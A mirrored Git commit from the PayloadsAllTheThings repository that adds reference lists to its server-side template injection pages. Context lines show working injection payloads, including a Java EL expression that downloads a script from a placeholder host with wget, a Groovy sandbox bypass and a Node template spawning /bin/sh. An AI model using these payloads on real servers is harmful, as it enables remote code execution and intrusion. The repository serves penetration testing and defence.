mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
SSTI references updates
This commit is contained in:
parent
51fe542992
commit
21dfd91180
9 changed files with 56 additions and 35 deletions
|
@ -5,13 +5,16 @@
|
||||||
- [ASP.NET Razor](#aspnet-razor)
|
- [ASP.NET Razor](#aspnet-razor)
|
||||||
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
|
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
|
||||||
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
|
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## ASP.NET Razor
|
## ASP.NET Razor
|
||||||
|
|
||||||
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
||||||
|
|
||||||
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
||||||
|
|
||||||
|
|
||||||
### ASP.NET Razor - Basic injection
|
### ASP.NET Razor - Basic injection
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -25,3 +28,8 @@
|
||||||
// C# code
|
// C# code
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
|
@ -6,6 +6,7 @@
|
||||||
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
|
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
|
||||||
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
|
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
|
||||||
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
|
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Expression Language EL
|
## Expression Language EL
|
||||||
|
@ -81,3 +82,14 @@ T(java.lang.Runtime).getRuntime().exec('whoami').x
|
||||||
// Method using ScriptEngineManager
|
// Method using ScriptEngineManager
|
||||||
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
|
||||||
|
- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
|
||||||
|
- [Expression Language Injection - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
|
||||||
|
- [Expression Language injection - PortSwigger - 2024](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
||||||
|
- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
|
||||||
|
- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
|
||||||
|
- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
|
@ -27,6 +27,7 @@
|
||||||
- [Groovy - HTTP request:](#groovy---http-request)
|
- [Groovy - HTTP request:](#groovy---http-request)
|
||||||
- [Groovy - Command Execution](#groovy---command-execution)
|
- [Groovy - Command Execution](#groovy---command-execution)
|
||||||
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
|
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
@ -276,4 +277,11 @@ or
|
||||||
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle @albinowax - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||||
|
- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle @albinowax - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s)
|
||||||
|
- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
|
|
@ -8,7 +8,7 @@
|
||||||
- [Lodash](#Lodash)
|
- [Lodash](#Lodash)
|
||||||
- [Lodash - Basic Injection](#lodash---basic-injection)
|
- [Lodash - Basic Injection](#lodash---basic-injection)
|
||||||
- [Lodash - Command Execution](#lodash---command-execution)
|
- [Lodash - Command Execution](#lodash---command-execution)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
|
||||||
|
@ -104,5 +104,8 @@ ${= _.VERSION}
|
||||||
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
|
||||||
|
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
|
@ -15,6 +15,7 @@
|
||||||
- [patTemplate](#pattemplate)
|
- [patTemplate](#pattemplate)
|
||||||
- [PHPlib](#phplib-and-html_template_phplib)
|
- [PHPlib](#phplib-and-html_template_phplib)
|
||||||
- [Plates](#plates)
|
- [Plates](#plates)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
@ -247,4 +248,7 @@ layout template:
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](#todo)
|
|
@ -413,4 +413,7 @@ PoC :
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
|
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
|
@ -83,28 +83,7 @@ Once the template engine is identified, the attacker injects more complex expres
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
||||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
|
||||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw)
|
||||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
|
|
||||||
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
|
||||||
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
|
||||||
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
|
||||||
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
|
||||||
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
|
||||||
* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
|
|
||||||
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
|
||||||
* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
|
||||||
* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
|
|
||||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
|
||||||
* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
|
||||||
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
|
||||||
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
|
|
||||||
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
|
|
||||||
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
|
|
||||||
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
|
|
||||||
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
|
|
||||||
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
|
|
||||||
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
|
|
||||||
* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
|
|
|
@ -8,6 +8,7 @@
|
||||||
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
||||||
- [Ruby - List files and directories](#ruby---list-files-and-directories)
|
- [Ruby - List files and directories](#ruby---list-files-and-directories)
|
||||||
- [Ruby - Remote Command execution](#ruby---remote-Command-execution)
|
- [Ruby - Remote Command execution](#ruby---remote-Command-execution)
|
||||||
|
- [References](#referenecs)
|
||||||
|
|
||||||
|
|
||||||
## Templating Libraries
|
## Templating Libraries
|
||||||
|
@ -70,4 +71,7 @@ Execute code using SSTI for **Slim** engine.
|
||||||
#{ %x|env| }
|
#{ %x|env| }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
|
@ -62,8 +62,8 @@ markdown_extensions:
|
||||||
- pymdownx.emoji:
|
- pymdownx.emoji:
|
||||||
emoji_index: !!python/name:material.extensions.emoji.twemoji
|
emoji_index: !!python/name:material.extensions.emoji.twemoji
|
||||||
emoji_generator: !!python/name:material.extensions.emoji.to_svg
|
emoji_generator: !!python/name:material.extensions.emoji.to_svg
|
||||||
- mdx_truly_sane_lists:
|
# - mdx_truly_sane_lists:
|
||||||
nested_indent: 2
|
# nested_indent: 2
|
||||||
# truly_sane: True
|
# truly_sane: True
|
||||||
|
|
||||||
plugins:
|
plugins:
|
||||||
|
|
Loading…
Reference in a new issue